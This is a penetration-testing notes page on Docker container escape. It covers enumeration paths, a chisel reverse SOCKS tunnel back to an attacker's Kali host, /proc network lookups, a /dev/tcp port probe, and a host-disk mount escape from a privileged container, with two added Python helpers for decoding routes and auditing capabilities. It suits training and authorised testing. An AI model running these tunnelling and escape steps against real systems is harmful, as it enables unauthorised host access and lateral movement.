Programmerboy Pentesting Stuff

Docker Container Escape

Looking For Potential Files

Whenever you are in a Docker container, enumerate the system as thoroughly as you can, because there is almost always something interesting in it.

// Potential directories where you can find something interesting

/opt
/home
/home/<username>
/tmp
/var/www/html

Doing Reverse Proxy Using Chisel

We can also set up a reverse proxy using chisel. This helps when you want to connect to a MySQL or Redis database but the client tools are not installed in the Docker container: run a reverse proxy and connect to MySQL or Redis through proxychains.

// Run chisel on Kali Linux first

chisel server --reverse -p 1234 --socks5

// Run chisel in the Docker container

./chisel client <ip of kali linux>:1234 R:socks

// Now you can use proxychains to access services on the Docker container

Looking For IP Addresses

Sometimes you cannot run the ip a or ifconfig command, so you can run the following to obtain the IP address.

// this sometimes shows the IP addresses of different services
cat /proc/net/fib_trie

Route Information

We can list the routes with the command below.

cat /proc/net/route

To convert the hexadecimal IP addresses, we can use the Python script below.

import sys

def hex_to_ip(hex_str):
    # Split the hex string into 4 chunks of 2 characters (octets)
    octets = [hex_str[i:i+2] for i in range(0, len(hex_str), 2)]
    
    # Reverse the order of octets for little-endian format
    octets.reverse()
    
    # Convert each octet from hex to decimal
    ip_octets = [str(int(octet, 16)) for octet in octets]
    
    # Join the decimal octets with dots to form an IP address
    ip_address = ".".join(ip_octets)
    
    return ip_address

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python hex_to_ip.py <hex_value>")
        sys.exit(1)
    
    hex_value = sys.argv[1]
    
    if len(hex_value) != 8:
        print("Error: The hex value should be 8 characters long.")
        sys.exit(1)
    
    ip = hex_to_ip(hex_value)
    print(f"Converted IP: {ip}")
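
The script above converts one field at a time. The following added example (not part of the original page) goes further and decodes the whole /proc/net/route table into CIDR networks and gateways; the sample table is constructed, and the hex fields are assumed to be little-endian as in the script above.

```python
import ipaddress
import struct

# Constructed sample in /proc/net/route format (not captured from a real host).
SAMPLE_ROUTE = (
    "Iface\tDestination\tGateway \tFlags\tRefCnt\tUse\tMetric\tMask\t\tMTU\tWindow\tIRTT\n"
    "eth0\t00000000\t010012AC\t0003\t0\t0\t0\t00000000\t0\t0\t0\n"
    "eth0\t000012AC\t00000000\t0001\t0\t0\t0\t0000FFFF\t0\t0\t0\n"
)

RTF_GATEWAY = 0x0002  # route goes through a gateway (linux/route.h)


def hex_to_ip(hex_str):
    """Decode one 8-digit hex field, stored little-endian, to a dotted quad."""
    if len(hex_str) != 8:
        raise ValueError(f"expected 8 hex digits, got {hex_str!r}")
    return str(ipaddress.IPv4Address(struct.pack("<I", int(hex_str, 16))))


def parse_routes(text):
    """Return one dict per route: interface, network in CIDR form, gateway."""
    routes = []
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 8:
            continue  # skip blank or truncated lines
        iface, dest, gateway, mask = fields[0], fields[1], fields[2], fields[7]
        flags = int(fields[3], 16)
        # Prefix length is the number of set bits in the netmask.
        prefix = bin(int(mask, 16)).count("1")
        routes.append({
            "iface": iface,
            "network": f"{hex_to_ip(dest)}/{prefix}",
            # The gateway field is only meaningful when RTF_GATEWAY is set.
            "gateway": hex_to_ip(gateway) if flags & RTF_GATEWAY else None,
        })
    return routes


if __name__ == "__main__":
    try:
        with open("/proc/net/route") as fh:
            table = fh.read()
    except OSError:
        table = SAMPLE_ROUTE  # fall back to the constructed sample off-Linux
    for route in parse_routes(table):
        print(route)
```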

Command To See Open Port

If you want to check whether a port is open and there is no Nmap or Netcat, you can run the command below.

cat < /dev/tcp/172.18.0.1/3306

Automated Tools

Deepce

We can use the Deepce tool from the link below to enumerate Docker containers for potential escapes.

bash deepce.sh

Docker Privileged Mode Enabled

If privileged mode is turned on, we can escalate our privileges from the Docker container to the host machine: in this case we can mount the host's files and folders inside the container and access them.

mkdir /mnt/host
mount /dev/xvda1 /mnt/host/
cd /mnt/host/
# now you can see the host OS files and folders
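
The mount above depends on the container holding CAP_SYS_ADMIN, which privileged mode grants. As an added audit check (not part of the original page), the following decodes the CapEff mask from /proc/<pid>/status and reports which isolation-weakening capabilities a container process holds; the two status excerpts are constructed samples and the RISKY_CAPS selection is this example's own choice.

```python
import re

# Bit numbers from linux/capability.h for capabilities that weaken isolation.
RISKY_CAPS = {
    2: "CAP_DAC_READ_SEARCH",
    16: "CAP_SYS_MODULE",
    17: "CAP_SYS_RAWIO",
    19: "CAP_SYS_PTRACE",
    21: "CAP_SYS_ADMIN",  # required by mount(2)
}

# Constructed /proc/<pid>/status excerpts (not captured from a real host).
DEFAULT_STATUS = "Name:\tsh\nCapEff:\t00000000a80425fb\n"     # reduced default set
PRIVILEGED_STATUS = "Name:\tsh\nCapEff:\t000001ffffffffff\n"  # every capability bit set


def effective_caps(status_text):
    """Return the CapEff bitmask from /proc/<pid>/status text as an int."""
    match = re.search(r"^CapEff:\s*([0-9a-fA-F]+)$", status_text, re.MULTILINE)
    if match is None:
        raise ValueError("no CapEff line found")
    return int(match.group(1), 16)


def risky_caps(status_text):
    """List the risky capabilities present in the effective set."""
    mask = effective_caps(status_text)
    return [name for bit, name in sorted(RISKY_CAPS.items()) if (mask >> bit) & 1]


def can_mount(status_text):
    """True when the process holds CAP_SYS_ADMIN, which mount needs."""
    return "CAP_SYS_ADMIN" in risky_caps(status_text)


if __name__ == "__main__":
    try:
        with open("/proc/self/status") as fh:
            status = fh.read()
    except OSError:
        status = PRIVILEGED_STATUS  # constructed sample when /proc is unavailable
    print("risky capabilities:", risky_caps(status) or "none")
    print("mount possible (CAP_SYS_ADMIN):", can_mount(status))
```

A container started without --privileged shows the reduced set, and the mount above then fails for lack of CAP_SYS_ADMIN.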

Last updated 2 months ago

Deepce on GitHub: stealthcopter/deepce - Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)